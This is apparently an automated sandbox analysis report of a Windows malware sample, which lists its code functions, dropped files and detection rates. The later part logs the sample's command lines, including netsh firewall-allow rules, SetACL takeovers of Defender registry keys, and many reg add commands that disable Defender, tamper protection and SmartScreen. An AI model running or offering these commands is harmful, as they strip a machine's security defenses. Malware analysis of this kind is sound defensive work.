Source: C:\Users\user\Desktop\4hIPvzV6a2.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeCode function: 0_2_00406DC60_2_00406DC6
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeCode function: 0_2_0040759D0_2_0040759D
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF6868213F07_2_00007FF6868213F0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68684A3507_2_00007FF68684A350
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF6868694BC7_2_00007FF6868694BC
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68685E4B07_2_00007FF68685E4B0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68686C28F7_2_00007FF68686C28F
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68684BC407_2_00007FF68684BC40
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF686856B2A7_2_00007FF686856B2A
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68687B74C7_2_00007FF68687B74C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68687C76C7_2_00007FF68687C76C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68685A6307_2_00007FF68685A630
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF6868375807_2_00007FF686837580
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF6868797187_2_00007FF686879718
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68682F6507_2_00007FF68682F650
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68687669C7_2_00007FF68687669C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF6868363E07_2_00007FF6868363E0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF6868734107_2_00007FF686873410
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF6868583607_2_00007FF686858360
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68686F3947_2_00007FF68686F394
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68684E5307_2_00007FF68684E530
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF6868742187_2_00007FF686874218
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68687A31C7_2_00007FF68687A31C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68685C2507_2_00007FF68685C250
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68686BFE87_2_00007FF68686BFE8
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68687DFF07_2_00007FF68687DFF0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68687EF6C7_2_00007FF68687EF6C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68686EF307_2_00007FF68686EF30
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF686883C647_2_00007FF686883C64
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68682E9D07_2_00007FF68682E9D0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68685F9C07_2_00007FF68685F9C0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68686EA107_2_00007FF68686EA10
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF686821A307_2_00007FF686821A30
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF686847B107_2_00007FF686847B10
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68686FB007_2_00007FF68686FB00
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68682CB207_2_00007FF68682CB20
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68687B74C11_2_00007FF68687B74C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF6868213F011_2_00007FF6868213F0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68684A35011_2_00007FF68684A350
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF6868694BC11_2_00007FF6868694BC
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68685E4B011_2_00007FF68685E4B0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68686C28F11_2_00007FF68686C28F
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68684BC4011_2_00007FF68684BC40
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF686856B2A11_2_00007FF686856B2A
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68687C76C11_2_00007FF68687C76C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68685A63011_2_00007FF68685A630
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68683758011_2_00007FF686837580
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68687971811_2_00007FF686879718
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68682F65011_2_00007FF68682F650
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68687669C11_2_00007FF68687669C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF6868363E011_2_00007FF6868363E0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68687341011_2_00007FF686873410
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68685836011_2_00007FF686858360
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68686F39411_2_00007FF68686F394
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68684E53011_2_00007FF68684E530
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68687421811_2_00007FF686874218
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68687A31C11_2_00007FF68687A31C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68685C25011_2_00007FF68685C250
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68686BFE811_2_00007FF68686BFE8
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68687DFF011_2_00007FF68687DFF0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68687EF6C11_2_00007FF68687EF6C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68686EF3011_2_00007FF68686EF30
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF686883C6411_2_00007FF686883C64
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68682E9D011_2_00007FF68682E9D0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68685F9C011_2_00007FF68685F9C0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68686EA1011_2_00007FF68686EA10
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF686821A3011_2_00007FF686821A30
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF686847B1011_2_00007FF686847B10
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68686FB0011_2_00007FF68686FB00
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68682CB2011_2_00007FF68682CB20
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\PowerRun64.exe 5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dll D115BCE0A787B4F895E700EFE943695C8F1087782807D91D831F6015B0F98774
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: String function: 00007FF686877998 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: String function: 00007FF686829D20 appears 188 times
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: String function: 00007FF686829CB0 appears 138 times
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: String function: 00007FF686829B00 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: String function: 00007FF686833F80 appears 232 times
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: String function: 00007FF68682AA20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: String function: 00007FF686834170 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: String function: 00007FF68682AC70 appears 186 times
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: String function: 00007FF6868294C0 appears 170 times
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameselfdel.dllJ vs 4hIPvzV6a2.exe
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSetACL.exe. vs 4hIPvzV6a2.exe
Source: 4hIPvzV6a2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: classification engineClassification label: mal96.phis.evad.winEXE@154/10@0/0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68683BF60 GetLastError,#13,SysStringByteLen,SysAllocStringByteLen,SysFreeString,LoadLibraryExW,LoadLibraryExW,FormatMessageW,LocalFree,FreeLibrary,_invalid_parameter_noinfo_noreturn,7_2_00007FF68683BF60
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF686843FD8 AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,7_2_00007FF686843FD8
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF686843D1B AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,7_2_00007FF686843D1B
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF686843A5E AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetLastError,7_2_00007FF686843A5E
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF6868342A0 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,7_2_00007FF6868342A0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF686843FD8 AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,11_2_00007FF686843FD8
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF686843D1B AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,11_2_00007FF686843D1B
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF686843A5E AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetLastError,11_2_00007FF686843A5E
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF6868342A0 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,11_2_00007FF6868342A0
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeCode function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049C7
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF686834810 FindResourceW,LoadResource,LockResource,FreeResource,_invalid_parameter_noinfo_noreturn,7_2_00007FF686834810
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2720:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2664:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_03
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeFile created: C:\Users\user\AppData\Local\Temp\nsv4B5.tmpJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn.bat
Source: 4hIPvzV6a2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 4hIPvzV6a2.exeReversingLabs: Detection: 36%
Source: 4hIPvzV6a2.exeVirustotal: Detection: 43%
Source: SetACL64.exeString found in binary or memory: -help
Source: SetACL64.exeString found in binary or memory: Type 'SetACL -help' for help.
Source: SetACL64.exeString found in binary or memory: Type 'SetACL -help' for help.
Source: SetACL64.exeString found in binary or memory: -help
Source: SetACL64.exeString found in binary or memory: Type 'SetACL -help' for help.
Source: SetACL64.exeString found in binary or memory: Type 'SetACL -help' for help.
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeFile read: C:\Users\user\Desktop\4hIPvzV6a2.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\4hIPvzV6a2.exe "C:\Users\user\Desktop\4hIPvzV6a2.exe"
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,private
Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,private
Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn1.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
